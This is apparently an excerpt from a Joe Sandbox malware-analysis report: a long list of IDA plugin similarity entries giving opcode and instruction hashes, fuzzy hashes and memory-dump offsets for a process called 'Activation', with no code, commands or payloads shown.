                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 192bfcf243f346db5b8b296d63fabbc74f22688e955470c235f855226fa24b42
                                                                                        • Instruction ID: a8a97a5ea3a02098342c9fb235f566498cc767cd1e93ba3ef326b0161261a5aa
                                                                                        • Opcode Fuzzy Hash: 192bfcf243f346db5b8b296d63fabbc74f22688e955470c235f855226fa24b42
                                                                                        • Instruction Fuzzy Hash: CCD01770A0120CEBCB00DFA8E941A5DB7F9EB44200B1085AAD809D3200EA316F01EB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dd1b73c554d4e8f3ece8a869319a9f1a691ae05d1e973de7edbda70c6384aa45
                                                                                        • Instruction ID: 2fc5cb50e4ac8353762071cfc0e7687dd74254ac9586520ff457d37238cb1431
                                                                                        • Opcode Fuzzy Hash: dd1b73c554d4e8f3ece8a869319a9f1a691ae05d1e973de7edbda70c6384aa45
                                                                                        • Instruction Fuzzy Hash: 40D05E70A0120CEFCB00DFB4ED81A6DB7F9EB44204B1046AAE808E3200EA316F05EB91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6eba9c5e0f5622b03036a2dbcf2c8172bea54479c4835e06489e699f16eb1e7b
                                                                                        • Instruction ID: d9d43a96f568b18212cd00b0c73dd40df6812f058e102f2ed8c6a335d847a931
                                                                                        • Opcode Fuzzy Hash: 6eba9c5e0f5622b03036a2dbcf2c8172bea54479c4835e06489e699f16eb1e7b
                                                                                        • Instruction Fuzzy Hash: E4D01770A0120DEF8B04EFB4E94195DB7F9EB44200B1042A9E909E7200EA316F04DB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0e24589da816bf5136cd52558f3b3e2fa03aa686baa4a5a37183f11936b3f59d
                                                                                        • Instruction ID: d24812c866f2501e63b8de40b495aaf08565d632e815e224e06079e627cdd83e
                                                                                        • Opcode Fuzzy Hash: 0e24589da816bf5136cd52558f3b3e2fa03aa686baa4a5a37183f11936b3f59d
                                                                                        • Instruction Fuzzy Hash: B6E01270A0510DEFCB00DFB4E941AADB7F1EB45204B1042AED809D3251DA711F14EB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9db5edb27ccad41f11d5a43a97dd9f6b1857d756023ca349908b28d2936b53c1
                                                                                        • Instruction ID: 8cd7d9088b2e48d8e263f1eb718693408aa2b73784ee8fa1552a2c84fee6eeb9
                                                                                        • Opcode Fuzzy Hash: 9db5edb27ccad41f11d5a43a97dd9f6b1857d756023ca349908b28d2936b53c1
                                                                                        • Instruction Fuzzy Hash: E1D05B70A0010DEFCB00DFB4ED41A5DB7F5EB45214B1042AAD808D3201DA315F10EB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb51b1c6c18b58e93bcb4271e21d7abf484ebe72b1daa24ab3895c75e8a04958
                                                                                        • Instruction ID: b0ac1da77cab2516c0ae159432a534146454dda8d382af186902f5037901b9b7
                                                                                        • Opcode Fuzzy Hash: fb51b1c6c18b58e93bcb4271e21d7abf484ebe72b1daa24ab3895c75e8a04958
                                                                                        • Instruction Fuzzy Hash: 0AD012327512189BD644B679F861A7D379EF7827A0F500065E5099B281DD951C0163D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff0bad1f9c92bf2d65ecf75a94e1fe8b7c08a8e5608ca14a00e2a7343f2f4c1d
                                                                                        • Instruction ID: 5fbc4536d8329dc23c8b2e0f979bc7449895065afc87a159b0fe46526a9f58bb
                                                                                        • Opcode Fuzzy Hash: ff0bad1f9c92bf2d65ecf75a94e1fe8b7c08a8e5608ca14a00e2a7343f2f4c1d
                                                                                        • Instruction Fuzzy Hash: 3ED023317511544FD744A238B861A7D2B95F782350F10016DE0059B281CDC00C0167C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0b989662e4f9e920f2693c8aaa2da013939651c104db05346377744bca0e9b92
                                                                                        • Instruction ID: d37f72d2011a2d4dbb904b375f64bece483828695d1cd1f1f5d9d264a1ea18b2
                                                                                        • Opcode Fuzzy Hash: 0b989662e4f9e920f2693c8aaa2da013939651c104db05346377744bca0e9b92
                                                                                        • Instruction Fuzzy Hash: 8CE0E27061021AEBEF209B58E99DBEDBB71FF45704F20042EE102AA2A0DBB80940CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0987a12eb894b8dcc48d69a492d29d1331a050aeead64a6dd51d1fe983787283
                                                                                        • Instruction ID: d3b072380bf2301d99d6420239d0ddd062bcd9770903606dc3f78f2396786a7f
                                                                                        • Opcode Fuzzy Hash: 0987a12eb894b8dcc48d69a492d29d1331a050aeead64a6dd51d1fe983787283
                                                                                        • Instruction Fuzzy Hash: A4D01774A01109EFCB44DFB4EA826ADB7F0EB44604B2006AAD509E7200EB315F04DB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 220c6c6a5cbb27e978566055103fbb98a781bfd7054d6c58e3317a489457f6af
                                                                                        • Instruction ID: 2c7d5c951b5a024f91a10b5c29310fec27efc74b5080e9c350e556253d779f00
                                                                                        • Opcode Fuzzy Hash: 220c6c6a5cbb27e978566055103fbb98a781bfd7054d6c58e3317a489457f6af
                                                                                        • Instruction Fuzzy Hash: 2EC0803171011457DE047678B41446D7BDDDBC76613104465D50997341DE56EC0257D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d54ba53df7138789ad8b44d22318b5f0dacb5f2c6a46ee43d428c8dbdee4269
                                                                                        • Instruction ID: 8e4aa61cc5052e258f13eb60471bbe3a94a78066737fa35aef7cac1d5e546a86
                                                                                        • Opcode Fuzzy Hash: 7d54ba53df7138789ad8b44d22318b5f0dacb5f2c6a46ee43d428c8dbdee4269
                                                                                        • Instruction Fuzzy Hash: BED0A9B224AA809FE7071320BC22B563F215B87201F0B81C2E2048B0A3C6260C0ACB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: df263057dd1be7a09ee8a4a4c471fe86284cc53b2ea27b20fa9ab43698293bad
                                                                                        • Instruction ID: 4e3cb031a936d4e634808a94fd7fabd8923922438fc33f9cf5ab7cc0ef95e21d
                                                                                        • Opcode Fuzzy Hash: df263057dd1be7a09ee8a4a4c471fe86284cc53b2ea27b20fa9ab43698293bad
                                                                                        • Instruction Fuzzy Hash: C4D0A7301045014FC708A768EC4BD66B790AF41311B0583D4B01D8B1E3CF61DC03CA84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f45e0af7a4472da6468415a2bc02109b1bb5896aac7ef3533e6d1539e1adce6
                                                                                        • Instruction ID: 66380d00acc87a70bc6b3061cff82c3827a4fd308c0aad2e3e01cdc282c67780
                                                                                        • Opcode Fuzzy Hash: 4f45e0af7a4472da6468415a2bc02109b1bb5896aac7ef3533e6d1539e1adce6
                                                                                        • Instruction Fuzzy Hash: 91D0C971204A658FD715AB68E944D967BA8AF4A625B0101A6F10DCB632DAA2DC008B91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9169e674724d346c6b59399a934ed38eb04c2ad00f8aa783f4afe80d800048ee
                                                                                        • Instruction ID: 6570345576d782adb4923600494666e00fd8779baf1e891ee875ec2277219ded
                                                                                        • Opcode Fuzzy Hash: 9169e674724d346c6b59399a934ed38eb04c2ad00f8aa783f4afe80d800048ee
                                                                                        • Instruction Fuzzy Hash: 01C012322002298FC604AB6CE944C8677ECEF49A2430102AAF10DCB232DAA1EC008BD5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f4776256a0a17b176e2f61b84a69bcf30d68bb1f58adeead3d255893ab9c5e2
                                                                                        • Instruction ID: 0d927f2b554629ed1b1aa4557217fe3d0125d76574a998f3fd862e63f779a6b9
                                                                                        • Opcode Fuzzy Hash: 9f4776256a0a17b176e2f61b84a69bcf30d68bb1f58adeead3d255893ab9c5e2
                                                                                        • Instruction Fuzzy Hash: 58D012701041054FC608E7A8EC4BC15F795BF44324355C3A9B01D4B2E79F61EC02C984
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1659397203.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_6160000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 14093bb9a3b9b5103a8d79e958dc4884bc788f9d762b237b2b3e3814a6a37d37
                                                                                        • Instruction ID: 9735df6c03b26543aeecc75934105d7468adbe7a4905fc17f5e05adefc9fb85c
                                                                                        • Opcode Fuzzy Hash: 14093bb9a3b9b5103a8d79e958dc4884bc788f9d762b237b2b3e3814a6a37d37
                                                                                        • Instruction Fuzzy Hash: 41C0023AA41009DFCB00DB99E484C98B3B1EF84229B1140A6E61697672C731AD65DB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe8aa318ba906934599a84d12e5657316bb0552e04ed8c6719c187946cd4392b
                                                                                        • Instruction ID: a435ef747465e442c4d28303601f62053def36e105aa94d893c63e46d8b02f05
                                                                                        • Opcode Fuzzy Hash: fe8aa318ba906934599a84d12e5657316bb0552e04ed8c6719c187946cd4392b
                                                                                        • Instruction Fuzzy Hash: 5AC02B32211420ABCB088744B808BCF3B1AEBCD300F15C245F20687150CF235C0397C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ff8da82d62c3b6864d2d3f1bc4416a50c63f9efe2547fa022512f96fed5ba9d5
                                                                                        • Instruction ID: 41d758350db06e30b30834e694702725e14aa3bdc0b65188b67aa45d8b8d2eff
                                                                                        • Opcode Fuzzy Hash: ff8da82d62c3b6864d2d3f1bc4416a50c63f9efe2547fa022512f96fed5ba9d5
                                                                                        • Instruction Fuzzy Hash: CDB012B30C06100BE203D690FFE3995336DD88401F7C61541B08C8B621E3BADE2BC5D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bf417136dfff397e0ded355473d8ed39ff2f33dda3af57e90b1a2b8d6f22aab7
                                                                                        • Instruction ID: 01518715f44573075fcf00a5d27bdff76da4d20fab315e6952d24a15f9244f41
                                                                                        • Opcode Fuzzy Hash: bf417136dfff397e0ded355473d8ed39ff2f33dda3af57e90b1a2b8d6f22aab7
                                                                                        • Instruction Fuzzy Hash: 42B092115597814FDA1723B805201892FA2A803270BC646D1C0A08A0F2DA0C0C1BDA26
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a0a5a161ca02236eff03e7bd953501e4d35d2ef6a267999bfc926922313000f0
                                                                                        • Instruction ID: 5ff35c58f3f87358c6a8c2df680efb9bb4b6acc0454ee0935405787e3d3ab115
                                                                                        • Opcode Fuzzy Hash: a0a5a161ca02236eff03e7bd953501e4d35d2ef6a267999bfc926922313000f0
                                                                                        • Instruction Fuzzy Hash: C3B0123104470D4BE5007760F606514376DE54411ABC01150F00C064115DB96C164BC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 86305ff537d4d2d40536dbdf5ea64f297457b8bebda8407d4a38bf9571d06283
                                                                                        • Instruction ID: d428bdbd6d96af6fe20b602dc8c84a758efaa646a9b095b9613acb560388e54c
                                                                                        • Opcode Fuzzy Hash: 86305ff537d4d2d40536dbdf5ea64f297457b8bebda8407d4a38bf9571d06283
                                                                                        • Instruction Fuzzy Hash: D5B012E164C1514FEE07D3548FB0B57765C5B0A124F0886984244CB542E1D8DC81C7D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec7424f089378874cd4ed76503d3d8110861f7341ad875be435904cc4cb9dee4
                                                                                        • Instruction ID: 737081debb7dc20dffcae2a96f875019cee3b25c359819017f8d63d1c521d919
                                                                                        • Opcode Fuzzy Hash: ec7424f089378874cd4ed76503d3d8110861f7341ad875be435904cc4cb9dee4
                                                                                        • Instruction Fuzzy Hash: F4B0123744A3510FC74376AC4C711C87AA02E1351438950E3C050CB063FB0C8C476D70
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9322bb352a1a7f5815a357a65d3d37e19d1d055610c79a8ee4f5b4a12da8c38e
                                                                                        • Instruction ID: 79ab8e71875189273ff18a0d17e9ef83630abc9f0b86b61f7233e8231cf772e3
                                                                                        • Opcode Fuzzy Hash: 9322bb352a1a7f5815a357a65d3d37e19d1d055610c79a8ee4f5b4a12da8c38e
                                                                                        • Instruction Fuzzy Hash: BFB0924AA0A6C007E7136615A4676123D1A6792111FEA41E98C944A65AF3080C6962A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2e2a74b7ece7797b240f8dec8c3cf97f24bbf00afc2ff903a7fef391e2bed83e
                                                                                        • Instruction ID: e94a1001a187e8a5624b271f435035c1a7cc31f0b0adf443de3860297c38d2a3
                                                                                        • Opcode Fuzzy Hash: 2e2a74b7ece7797b240f8dec8c3cf97f24bbf00afc2ff903a7fef391e2bed83e
                                                                                        • Instruction Fuzzy Hash: D5B01230100011D3D504C600C89531D79007B81304F94505440574B191CE06C4029180
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a7b0d2b9e671380ee2163d608feae22cbc65722f2d33fb0e867052b4fcb97a6
                                                                                        • Instruction ID: e200d171d63f1620e0bbfdc76fb5a1cd39b8b58cf711414ee3e653fb4dd0c8ee
                                                                                        • Opcode Fuzzy Hash: 2a7b0d2b9e671380ee2163d608feae22cbc65722f2d33fb0e867052b4fcb97a6
                                                                                        • Instruction Fuzzy Hash: 89A0023521A2108BCF5E1635481813935527BC77057EE49FD80060DA61DA3ACC42F654
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1658627738.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ab0000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8cd1dbbe6648870283e3518aea477d3ea7bf6a21bd1b9ba523935d3dd02cd106
                                                                                        • Instruction ID: 607583cf53cb7d2e071e2081664fe7c3c25318ffab1c4e7d790526abef0eb12c
                                                                                        • Opcode Fuzzy Hash: 8cd1dbbe6648870283e3518aea477d3ea7bf6a21bd1b9ba523935d3dd02cd106
                                                                                        • Instruction Fuzzy Hash: B21291F84A174E8AE320DF65E84A1863FB3F761318B544609E2E11B2D5DBBD118BDF44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1658627738.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ab0000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6328a992ad3759eec50abc439dff087517be2acfa41ec83bfe2db920fb21e395
                                                                                        • Instruction ID: 11dfb7e35f279c6304f8875a08fcee78944a8959295c74c45b8debd2e517c069
                                                                                        • Opcode Fuzzy Hash: 6328a992ad3759eec50abc439dff087517be2acfa41ec83bfe2db920fb21e395
                                                                                        • Instruction Fuzzy Hash: 31E1F835C2075A8ADB11EBA4D894ADDB7B1FF99300F60879AE10977211FB706AC4CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1658627738.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ab0000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4f6111a6a83a1f82d151abc0313cb36b25bcd42945f055270badb6de32fb74d9
                                                                                        • Instruction ID: fcaf73286915e4a2f8c3c14bb8bd725425a7fc9b53604ceca30c60c844fbef20
                                                                                        • Opcode Fuzzy Hash: 4f6111a6a83a1f82d151abc0313cb36b25bcd42945f055270badb6de32fb74d9
                                                                                        • Instruction Fuzzy Hash: 11D1E835C2075A8ADB11EBA4D894A9DB7B1FF99300F60879AE10937211FF706AC4CF91
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1650309860.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c90000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd9f0351c9c4836a6de4363df7863aa000c4d29febf8fcf4f1c4f7547f179350
                                                                                        • Instruction ID: d9f1c77a87b6b3a106dcdbf53da527a0d06bb02ee6160a501ad7778e2f7c3054
                                                                                        • Opcode Fuzzy Hash: cd9f0351c9c4836a6de4363df7863aa000c4d29febf8fcf4f1c4f7547f179350
                                                                                        • Instruction Fuzzy Hash: EF914EB0E00249DFDF10CFA9C9897AEBBF2BF88714F148529E415E7254EB749A45CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1658627738.0000000005AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AB0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5ab0000_Activation.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fc39f87db42b08c8c24a3ed51152ef1b509c4d32b56dc105165ddffe3f3458b2
                                                                                        • Instruction ID: 40eeccbe6ff86289845e0e525d642213bd295a6b6fcef960cca2451e8e4c080c
                                                                                        • Opcode Fuzzy Hash: fc39f87db42b08c8c24a3ed51152ef1b509c4d32b56dc105165ddffe3f3458b2
                                                                                        • Instruction Fuzzy Hash: B2C1F7B84A074D8AE720CF65E84A18A7FB3FBA5314F144609E1A16B2D1DFBC148BDF44